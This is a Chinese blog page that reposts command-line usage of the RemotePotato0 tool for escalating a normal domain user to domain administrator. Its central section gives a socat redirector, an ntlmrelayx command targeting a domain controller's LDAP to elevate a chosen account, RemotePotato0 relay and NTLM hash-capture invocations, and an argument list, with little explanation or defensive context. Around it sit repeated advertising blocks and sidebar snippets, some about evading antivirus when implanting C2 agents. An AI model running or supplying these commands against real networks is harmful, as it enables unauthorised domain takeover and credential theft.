网络安全最新使用RemotePotato0从普通用户提升至域管理员_potato-2,2024年最新网络安全开发需要学什么

于 2024-05-15 05:29:50 发布
阅读量867 收藏 25
点赞数 26
分类专栏: 程序员 文章标签: 网络安全 学习 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84301352/article/details/138885253
版权

一、网安学习成长路线图

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

源码获取
广大研究人员可以使用下列命令将该项目源码克隆至本地:
git clone https://github.com/antonioCoco/RemotePotato0.git

使用场景
攻击设备(10.0.0.20)
目标设备(10.0.0.45)
目标域控制器(10.0.0.10)
模块0 - Rpc2Http跨协议中继服务器 + potato触发器
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.0.0.45:9999 &
sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user
注意:如果你操作的是Windows Server <= 2016,你可以避免使用网络重定向器(socat):
query user
.\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1
模块1 - Rpc2Http跨协议中继服务器
.\RemotePotato0.exe -m 1 -l 9997 -r 10.0.0.20
rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm
模块2 - RPC捕捉(哈希)服务器
.\RemotePotato0.exe -m 3 -l 9997
rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm

工具使用
RemotePotato0
Mandatory args:
-m module
Allowed values:
0 - Rpc2Http cross protocol relay server + potato trigger (default)
1 - Rpc2Http cross protocol relay server
2 - Rpc capture (hash) server + potato trigger
3 - Rpc capture (hash) server

Other args: (someone could be mandatory and/or optional based on the module you use)
-r 远程HTTP中继服务器IP
-t 远程HTTP中继服务器端口 (默认为80)
-x 流氓Oxid解析器IP (默认为127.0.0.1)
-p 流氓Oxid解析器端口 (默认为9999)
-l RPC中继服务器监听端口 (默认为9997)
-s 跨会话激活攻击的目标会话IP (默认为disabled)
-c CLSID (默认为{5167B42F-C111-47A1-ACC4-8EABE61B0B54})

一、网安学习成长路线图

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84301352
关注
  • 26
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
get_AV:Windows杀软在线对比辅助
02-03
get_AV Windows杀软在线对比辅助 杀软进程数据存放在av.json,目前正在收集杀软进程中,欢迎补充 数据来源:网络 UI框架: 在线版: : 完善数据+修复已知错误+修改匹配正则-2019.09.01 特别感谢: 杀软数据补充: -2019.09.01 -2019.12.13
windows杀软在线识别平台
siu~
06-30 2153
在内网攻防中,当拿到一个对外服务器权限后,必不可少的就是要上线MSF或者CS进行内网横移,这个时候如果服务器上存在杀软,就会影响木马上线。
2024最全ConcurrentHashMap是如何保证线程安全的(2)
最新发布
2401_84265972的博客
05-01 759
当我到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。// 使用同步锁的方式,来保证线程安全,给头节点加锁。
windows黑客编程系列(六):进程遍历之查询系统是否运行杀软
至臻求学,胸怀云月
04-22 2370
文章目录功能技术模块进程遍历WIN APICreateToolhelp32SnapshotProcess32FirstPROCESS32Next编码实现运行效果图判断是否存在杀软运行效果 功能技术模块 病毒木马的入侵并潜伏在用户计算机上总是有着某种目的,例如获取用户隐私的办公文件或是账号密码,或是控制肉鸡,或是进行加密磁盘文件然后进行勒索。 进程遍历 进程遍历指的是获取在计算机系统上运行的所有进程...
免费Windows杀毒软件
neil
06-26 153
1. AVG Anti-Virus免费版 非常低的资源占用和简单的操作是AVG杀毒软件最大的特点.尽管是免费软件,但是功能非常完整,支持自动升级.官方无简体中文版. 2. Avast!家庭版 Avast!拥有简洁的用户界面和全方位保护功能.相比卡巴斯基等商业软件复杂的设置选项,Avast!的操作界面能够让普通用户都非常容易上手,其功能也媲美商业杀毒软件.国内有一个Avas...
potato-2.25.2.apk
10-30
potato-2.25.2.apk
potato-2.37.5.apk
06-06
potato-2.37.5.apk
potato 土豆最新版本下载potato_v2.20.201001,安卓版本
01-29
potato 土豆最新版本下载potato_v2.20.201001,安卓版本
purescript-emo8::roasted_sweet_potato:可以创建表情符号游戏的功能性2D游戏引擎
02-04
想要使用PureScript编写清晰的程序 为什么是表情符号? 可以在任何地方使用的熟悉的材料 创建游戏,例如组装乐高积木 有趣的是有一些限制,例如 为什么选择PureScript? 语言抽象 可分配性 PureScript ○ ○ ...
Potato-Windows-2.35
04-01
Potato-Windows-2.35........................................................................................................................................................................................
大量免费在线杀毒网址
12-29
迈克菲 McAfee (麦咖啡) 免费在线查毒 说明:需要安装ActiveX插件 地址: http://cn.mcafee.com/root/mfs/default.asp?cid=16943 趋势科技在线扫毒 说明:需要安装ActiveX插件 地址: http://www.trendmicro.com.cn/housecall/start_corp.asp 光华反病毒软件在线杀毒 地址: http://www.viruschina.com/free/freevirus.asp 金山毒霸免费查毒 地址: http://zs.kingsoft.com/safe_intro_1.shtml
目前一个比较权威的各类杀毒软件在线检测的网站
Rock的专栏
12-15 6532
http://www.virscan.org/
记一次内网横向免杀测试
渗透测试研究中心
02-15 3098
工具准备jexbossKali LinuxCS 4.3Windows杀软在线查询一Windows杀软在线查询二Windows杀软在线查询三fscan潮汐shellcode免杀LSTARCobaltStrike其他插件PEASS-ngPrintSpoofer外网打点1、为了练习内网横向,悄悄的盯上国外的站点2、发现jboss网站存在反序列化漏洞,是呀jexboss无法利用成功python jexb...
2024全国职业技能大赛“网络安全赛项”国赛 模块B 任务解析(超详细)_2024全国职业院校技能大赛高职组“网络空间安全(1)
2401_84247559的博客
04-26 444
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。,毕竟实战是检验真理的唯一标准嘛~最后就是项目实战,这里带来的是。
网络安全行业需要历吗?需要考研吗?(1)
2401_84239830的博客
04-27 291
👉👈​。
https://www.hackjie.com/
weixin_30522183的博客
04-09 1491
黑客推荐 HackOne 国际漏洞提交平台 Github 谷歌镜像站 谷歌镜像 T00LS 低调求发展-潜心习安全 FreeBuf 互联网安全新媒体 Black Hat 国际 H 乌云镜像 收集前乌云所存漏洞库的网站 黑客街 SR...
常用的渗透测试辅助工具
IDO老徐软件测试窝
10-08 659
通常的黑客攻击包括预攻击、攻击和后攻击三个阶段;预攻击阶段主要指一些信息收集和漏洞扫描的过程;攻击过程主要是利用第一阶段发现的漏洞或弱口令等脆弱 性进行入侵;后攻击是指在获得攻击目标的一定权限后,对权限的提升、后面安装和痕迹清除等后续工作。与黑客的攻击相比,渗透测试仅仅进行预攻击阶段的工 作,并不对系统本身造成危害,即仅仅通过一些信息搜集手段来探查系统的弱口令、漏洞等脆弱性信息。...
爬虫常用工具类网站
年轻就做四件事:挣钱存钱、见世面、交朋友、学本事。
05-16 1667
https://spidertools.cn/#/ 爬虫工具库 各种格式化 参数提取 加密解密 爬虫分享。http://tool.chinaz.com/tools/unicode.aspx 站长工具编码解码合集。http://web.chacuo.net/netproxycheck 代理服务器连接测试工具。https://www.json.cn/ json解析 json处理。https://base64.us/ Base64编码解码。
渗透测试-内网信息收集
cdyunaq的博客
04-28 3054
1 收集本机信息 1.1 手动收集信息 查询网络配置信息 ipconfig /all 查询操作系统和版本信息 systeminfo | findstr /B /C:"OS Name" /C:"OS Version" systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" 查询系统体系结构 echo %PROCESSOR_ARCHITECTURE% 查看安装的软件及版本、路径等 wmic product get name,version 利用PowerS
class SweetPotato: def __init__(self): self.cooked_level = 0 self.cooked_string = "生的" self.condiments = [] def cook(self, time): self.cooked_level += time if self.cooked_level >= 0 and self.cooked_level < 3: self.cooked_string = "生的" elif self.cooked_level >= 3 and self.cooked_level < 5: self.cooked_string = "半生不熟" elif self.cooked_level >= 5 and self.cooked_level < 8: self.cooked_string = "熟了" elif self.cooked_level >= 8: self.cooked_string = "烤糊了" def add_condiment(self, condiment): self.condiments.append(condiment) def __str__(self): return f"这个地瓜现在是{self.cooked_string}的状态,加了{', '.join(self.condiments)}作料。"sweet_potato = SweetPotato() print(sweet_potato) sweet_potato.cook(2) print(sweet_potato) sweet_potato.add_condiment("盐") sweet_potato.cook(4) print(sweet_potato) 解释一下这代码
07-13
3. `self.cooked_level = 0`:创建了一个实例变量cooked_level,并将其初始值设为0。cooked_level用于表示地瓜的烤制程度。 4. `self.cooked_string = "生的"`:创建了一个实例变量cooked_string,并将其初始值设为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值